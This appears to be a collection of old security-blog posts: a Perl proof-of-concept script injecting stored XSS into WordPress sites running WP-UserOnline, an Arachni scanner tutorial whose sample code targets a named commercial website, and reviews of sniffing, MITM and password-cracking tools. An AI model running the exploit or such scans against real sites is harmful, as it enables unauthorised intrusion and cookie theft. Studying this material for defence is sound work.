Persistent XSS vulnerability in WP-UserOnline

#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################
use IO::Socket;

my ($host,$sock,$content,$response);

$url =~ /http:\/\/(.+)\/?/;
$host = $1;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
 print "The Socket: $!\n";
 exit();
}
print $sock "GET $xss HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: $agent\n";
print $sock "Connection: close\n";
print $sock "\n\n";
while (<$sock>) {
 $content .= $_;
}
print "$url - ";
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
 $response = $1;
}
if ($response == 200 or $response == 400) {
 print "OK\n";
}
else {
 print "Error: $response\n";
}

How to use Arachni Framework

http://arachni.segfault.gr/latest The first thing you will need is CYGWIN, get it here. After it is installed download arachni and use the self extarcting archive and extract it to a folder of your choice. When it's done extracting, open the Cygwin.bat file. Now, we can create a simple RUBY file to include the arachni framework and start auditing a webpage. Type notepad text.rb and notepad will ask if you want to create the file, click yes. In here is where we will use the arachni framework.

Include the header for the CLI output and arachni itself

1:  require 'arachni/ui/cli/output'  
2:  require 'arachni'  

Turn off verbose

1:  Arachni::UI::Output.mute!  

Get some options from the framework

1:  opts = Arachni::Options.instance  

Specify that we want to audit html forms

1:  opts.audit_forms = true  

Now specif the URL (seed)

1:  opts.url = 'http://testfire.net/'  

if we only want to scan a single URL we would add this line

1:  opts.restrict_paths << 'http://testfire.net/search.aspx'  

New class (new arachni object with our options)

1:  framework = Arachni::Framework.new(opts)  

if we want to look for XSS exploits we would use

1:  framework.modules.load(['xss'])  

You can load ALL the modules by using a asterisk

1:  framework.modules.load(['*'])  

now run arachni

1:  framework.run  

get the first exploit we see

1:  issue = framework.audit_store.issues.first  

show the exploit we found on screen (cli output)

1:  puts "#{issue.name} at #{issue.url} in #{issue.elem} input `#{issue.var}` using #{issue.method}."  

And here is a code to scan for all the modules against a specific page.

1:  require 'arachni/ui/cli/output'  
2:  require 'arachni'  
3:  Arachni::UI::Output.mute!  
4:  opts = Arachni::Options.instance  
5:  opts.audit_forms = true  
6:  opts.url = 'http://www.bigcinemas.com/'  
7:  opts.restrict_paths << 'http://www.bigcinemas.com/in/sendSMS.asp?mobNum=9762001337'  
8:  framework = Arachni::Framework.new( opts )  
9:  framework.modules.load(['*'])  
10:  framework.run  
11:  issue_arr = framework.audit_store.issues  
12:  issue_arr.each do|issue|  
13:    puts "#{issue.name} at #{issue.url} in #{issue.elem} input `#{issue.var}` using #{issue.method}.\n"  
14:  end  

Sniffing HTTP with httpry 0.1.6

I was skeptical when I first saw this come across Packetstorm, but I gave it a shot, like most tools that come rifling through there. I believe that if you make a security tool intended for UNIX it had better have a version compatible with Debian, the most popular OS for quick security testing.

It is easy to install and ran great the very first time with no problems. I was hesitant before because this kind of task can already be done with tools provided by UNIX already and I am not sure what kind of use this tool has for security when other tools are out there. If the project keeps moving forward it could be a seriously handy tool.

In the description it says it doesn't handle the analysis of the HTTP traffic it has logged, maybe that is something to mess with, or maybe I will make a parser. However, anything logged to files can be easily pulled with Regular Expressions. Here are the steps to install httpry 0.1.6 from Packetstorm.

1. wget http://packetstorm.igor.onlinedirect.bg/sniffers/httpry-0.1.6.tar.gz
2. tar -xvf httpry-0.1.6.tar.gz
3. cd httpry-0.1.6
4. make
5. ./httpry

You can run httpry by typing ./httpry and just wait for the traffic to roll in. Below I ran httpry while downloading lynx (a command line http browser) via apt-get repositories.

to stop capturing I simply issued a ctrl+c and it closed it for me and told me how many packets were logged. There is an extensive README file which can help you discover more. I think this is and will continue to be a good tool for securing yourself against http infections. Here are some command line switches for reference:

1. -b FILE
2. -d
3. -f FORMAT
4. -F
5. -h
6. -i
7. -m METHODS
8. -n COUNT
9. -o FILE
10. -p
11. -q
12. -r FILE
13. -t SECONDS
14. -u USER

Wireshark 1.4.6

Ever since Wireshark come on the scene it was adopted as the #1 LAN sniffer for security demonstrations, says me. You don't have to believe all the hype and can go back to your console screen logging hours at the page down key. Wireshark for Windows is the best choice for capturing LAN traffic. Download Wireshark Here.

Wireshark is extremely easy to use and even a novice can start capturing data on the network. Wireshark features a very rich system to let you edit and resend packets over the network. You can set it to stop capturing after 'x' amount of packets which can be VERY handy for testing application bugs. You can control the size of capture log files and even use multiple files to log your captures too.

Cain & Abel 4.9.40

Cain & Abel is an old school tool that has finally started updating. I remember using this a while ago when I first started getting into security and more namely, hacking. Cain & Abel as told by the official website is a password recovery tool for Windows. This isn't your ordinary password cracker. Cain & Abel can do so much more and has a whole bunch of features you can find useful for network activities. It's also super easy and quick to install.

Sniffing the Network

Cain & Abel make it easy to sniff your own network's traffic by performing a "main in the middle" attack. This allows you to become a person on the network that basically relays the information to where it needs to be allowing you to view the traffic along it's way. You can perform trace routes and even view the local workgroups and other connected computers.

Password Tools

The password tools let you import local passwords like from MS Outlook user accounts. The password cracker also cracks individual password hashes. You can perform dictionary attacks on the password hashes until it finds one, it is highly threaded so it shouldn't be a problem cracking multiple hashes.

Remote Registry & Shares

Along with viewing the users on your network you can even look into their registry if the remote registry is enabled. You can also view and interact with the local shares on the network.Cain & Abel is a very nice and fast alternative to viewing shares than even Windows. You can help diagnose problems on the network with this tool making it a staple in the windows users arsenal. You can do most of these via the command line, but this give a nice clean interface so we aren't scrolling through hundreds if not thousands of console lines and logs.

Nessus 4.4.1

 Nessus is a network scanner that checks for vulnerabilities. You will have to register for an activation code but it's free. Nessus is famous for it's plugins and boasts it on their website as well. You can find several videos on their website that show instructions for installing and even operating Nessus. You can download it here.


I don't mind registering products that are free. In fact, as a developer I sometimes go out of my way to register products that are free. I suggest you do the same, plus I don't think you have access to the plugins if you don't register it. We are using the Windows version, and that is the only version under review here today.

After installing and registering it will take a long time to download and update their immense plugin library. Why was I not allowed to pick or just get a small minimal set? I thought the process took a long time to download and update and I definitely wasn't expecting it. You can view a full list of the plugins and the latest plugins added on their website. I checked back several minutes later and found that it was only at 26%.

Despite taking forever to "initialize" Nessus has a very nice browser based interface with easy to use controls for scanning entire ranges of addresses. I definitely recommend this product.

Insect Pro 2

Insect Pro is a "Web Scanner" tool by insecurityresearch. Besides spamming it up on FD to try and get donations for their cause insecurityresearch seems to have offered a rather nice tool, except for it's size at 120mb. I am testing the Insect Pro 2 web scanner, but it was told to me that it would be the 2.5 version after they irritated people over at FD. The extraction process is long and boring from winzip, but I stuck in there.


After the lengthy extraction process I poked around in the directories and soon found they packaged Metasploit with it. They didn't stop there either, it was also packaged with Python 2.7, NMap, RUBY and skipfish. I didn't even install this tool as I could already see that it was simply an interface for using Metasploit exploits, please correct me if I am wrong..

They also claim to release this tool for free, but you have to make a donation in order to use it. If you complain to them about it they might send you a copy. I DO NOT recommend this tool for use.